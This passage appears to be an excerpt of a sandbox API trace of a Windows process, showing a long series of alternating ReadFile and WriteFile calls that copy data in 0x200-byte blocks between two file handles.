lpOverlapped=0x0) returned 1 [0026.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.171] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.191] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.194] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.196] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, 